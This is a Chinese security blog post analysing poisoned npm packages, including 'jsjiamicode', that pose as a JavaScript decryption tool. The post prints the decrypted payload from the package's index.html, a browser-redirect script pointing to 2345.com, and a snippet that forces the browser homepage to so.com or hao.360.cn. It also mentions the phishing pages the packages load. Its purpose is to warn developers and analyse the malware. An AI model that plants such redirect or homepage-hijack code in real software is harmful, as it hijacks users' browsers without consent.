小心NPM投毒包篡改你的浏览器主页

admin 2025年6月5日03:26:13评论19 views字数 1138阅读3分47秒阅读模式

背景

今天发现个声称是 jsjiami 解密工具的NPM包(jsjiamicode),本以为开发者为爱发电,最后发现一肚子坏水。

小心NPM投毒包篡改你的浏览器主页

该组件会将用户的浏览器重定向到 http://www.2345[.]com/,并且该投毒者发布的其他组件还会强制将浏览器的主页设置为 http://www.so[.]com/ 或 http://hao.360[.]cn/ (360导航),并加载钓鱼网站到用户的浏览器页面。

分析

下载后源码中的index.html中写入很长的经过jsjiami的js代码:

小心NPM投毒包篡改你的浏览器主页

进行解密(解密工具:https://github.com/Mikephie/Decodejs):

小心NPM投毒包篡改你的浏览器主页

解密后的核心代码:

if(window.location.href.indexOf("2345.com") == -1 &&    window.location.href.indexOf("baidu.com") == -1 &&    window.location.href.indexOf("sogou.com") == -1 &&    window.location.href.indexOf("so.com") == -1 &&    window.location.href.indexOf("google.com") == -1 ){    var url = "http://www.2345.com/?k"+Math.random();    window.location.href=url;}
这段代码检查当前的网址。如果当前网址不包含 "2345.com", "baidu.com", "sogou.com", "so.com", 或 "google.com" 中的任何一个,它就会将用户的浏览器重定向到 http://www.2345.com/,并带上一个随机参数。
这位“好心人”还发布了其他的投毒包,投毒手法相似:
小心NPM投毒包篡改你的浏览器主页
其它投毒包会通过以下代码强制修改把用户浏览器的主页设置为 http://www.so.com/ 或 http://hao.360.cn/ (360导航):
obj.style.behavior = 'url(#default#homepage)'obj.setHomePage(vrl);
同时还会加载钓鱼网站内容到用户的浏览器页面:
小心NPM投毒包篡改你的浏览器主页
钓鱼链接的沙箱检测:
小心NPM投毒包篡改你的浏览器主页

总结

一些高度混淆加密或者灰色的投毒包NPM官方下架并不及时,部分投毒组件会在官方仓库保存几个月或更久,命名混淆或者这种打着开源工具幌子的投毒组件确实挺恶心的,用户安装npm组件的时候一不小心就会中招。但是话说回来,想想老外的浏览器主页被设为2345.com就有点绷不住。。。

原文始发于微信公众号(KeepHack1ng):小心NPM投毒包篡改你的浏览器主页

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年6月5日03:26:13
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   小心NPM投毒包篡改你的浏览器主页https://cn-sec.com/archives/4133779.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息